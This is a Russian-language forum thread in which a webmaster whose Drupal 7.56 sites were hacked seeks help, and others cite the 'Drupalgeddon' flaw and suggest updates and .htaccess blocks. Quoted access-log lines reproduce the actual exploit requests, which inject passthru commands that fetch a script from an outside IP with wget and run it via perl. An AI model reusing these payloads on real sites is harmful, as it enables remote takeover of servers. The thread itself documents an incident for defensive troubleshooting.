25 апреля 2018 в 18:04
Здрасьте. Вот у меня сайтов 15 сделано на Drupal 7.56. Из них в апреле 10 взломано. Не тронуты 7.58 и 7.54. Это я такой неудачник, или это по статистике больше половины сайтов на Drupal 7.56 ломается ?
Вчера один сайт обновил, вижу что вирусов нет. Сайт не изменялся, поэтому я и базу восстановил на пару месяцев назад. Но происходят такие запросы:
[u][24/Apr/2018:22:28:57 +0300] 0.250 0.250 200 185.234.217.11 auto-discount69.ru POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=cd+/var/tmp/+;+cd+/tmp/+;+rm+-rf+maxx2.txt+;+wget+http://195. 22.126.16/maxx2.txt+;+mv+maxx2.txt+wget.txt+;+perl+wget.txt+195.22.127.225+;+lwp-download+ht tp ://195.22.126.16/maxx2.txt+;+mv+maxx2.txt+lynx.txt+;+perl+lynx.txt+195.22.127.225+;+fetch+http://195.22.126.16/maxx2.txt+;+mv+maxx2.txt+fetch.txt+;+perl+fetch.txt... HTTP/1.1 "curl/7.35.0" "-" 14941 141.8.194.189 a123456
И сайт падает в офлайн:
"В настоящий момент сайт потребляет ресурсов больше,
чем доступно по тарифному плану.
Пожалуйста, зайдите позднее."
В техподдержке ничего не сказали кроме того что сайт у меня без вирусов (они проверили), а то что он отключается, связано с запросами, которые выше. А я то дуб дубом в этих запросах. Может кто знает, что можно делать, или я так понимаю ботам надоест эти запросы слать со временем.
Комментарии
Ломаются все сайты своевременно не обновленные до 7.58
Это попытки взлома.
Вам бы их прикрыть хотя бы в .htaccess, если вас ими долбут, то позволит отбить на уровне веб-сервера.
Но не вижу причин, чтобы сайт ложился от такого запроса
Методом тыка добавил в .htacess блокировку по диапазону ip
Order Deny,Allow
Deny from 195.0.0.0/8
Стало всё нормально... пока айпи не сменится.
А сегодня опять патч на друпал выйдет вроде ? Опять все обновлять нужно будет ?
upd/ Не, опять отключился сайт.
10 лет на 6, 7 и 8 - никаких проблем. Но тут прилетела эта фигня от 28 марта - почти все 7 и 8 в середине апреля были взломаны )
На местном сленге, это зовется "Друпалгедоном".
Это второй, сейчас, бушует. Первый был в злосчастном, 14м.
Ну хоть обрадовали, не у меня одного. А то я уже пароли от сайтов начал хранить в архиве под паролями ) Думал что с компьютера сперли что нибудь.
Господа, подскажите
Я уж сайт обновил весь до 7.59, модули все новые записал в тему, библиотеки новые закачал, короче всю папку sites проверил и перезалил с исходника. Модулем hacked проверил. По дате изменения проверил. Базу просканировал на всякие вредности, тем более база взята с копии двухмесячной давности.
Прописывал доступ в htacess только своему IP, проверял что с другого айпи не заходит.
Но сайт всё равно отключается из за перегрузки. Я мало понимаю, но как, если все IP заблокированы.
В итоге вот:
Аккаунт был заблокирован во время попытки попытки взлома ваших сайта на CMS Drupal через критическую уязвимость:
[u][24/Apr/2018:15:10:25 +0300] 0.350 0.350 200 185.212.128.77 auto-discount69.ru POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=pwd&name[%23type]=markup HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36" "http://auto-discount69.ru/wp-admin/admin-ajax.php" 4923 141.8.194.189 a0112345
Техподдержка говорит - обновите сайт. Я им говорю, что уже обновил. Они мне опять обновите, я говорю что обновил. Опять проверят своим антивирусом, напишут что ничего нет. А если выждать паузу в 12 часов и спросить их опять про сайт, они опять говорят чтобы я обновил сайт.
Видимо, техподдержка не очень умная и не понимает, что далеко не все хакеры знают, что вы обновили сайт.
Поэтому безуспешные попытки взломов будут продолжаться.
Уточните у них, в чём именно претензия к вам
Как вариант сменить хостера на более адекватного
Да они со мной здороваются в каждом сообщении, что то не так.
Я спросил "Нагрузка такая, это от сайта нагрузка, или от того что кто то запросы шлет ?"
Ответили вот:
Здравствуйте. <<<----опять здороваются
Повышенной нагрузке предшествовал запрос:
[u][24/Apr/2018:22:37:00 +0300] - 482.250 499 185.234.217.11 auto-discount69.ru POST //?q=file/ajax/name/%23value/form-ww-QqJvaCo1gsPfPgEmtwULBYx98mrOThEvPdPa1I88 HTTP/1.1 "curl/7.35.0" "-" 0 141.8.194.189 a0123456
Нам неизвестно, какие именно данные были переданы в POST-запросе, и, соответственно, определить источник нагрузки уже невозможно.
Доступ к сайтам по основным доменам разблокирован.
Да как бы не должно оно ложиться от попыток взлома. Да и не ложится, иначе бы пол-рунета уже встало раком.
ИМХО проблема не в сайтах, а в хостинге.
1. Drupal хреново переносит POST-запросы, вполне может DoS быть.
2. Пол-рунета уже стоит раком. У меня по-моему только друру без косяков открывается.
У меня стабильно один только телеграм работает:))))
Мне кажется что сайт по автозапчастям это какая-то странная цель для ддоса. Да и вообще я не вижу что там может тормозить, там 3 (три!) страницы. Никакого каталога, никаких выборок, ничего.
Я бы то вообще переделал в одностраничный лэндинг без всякого пхп.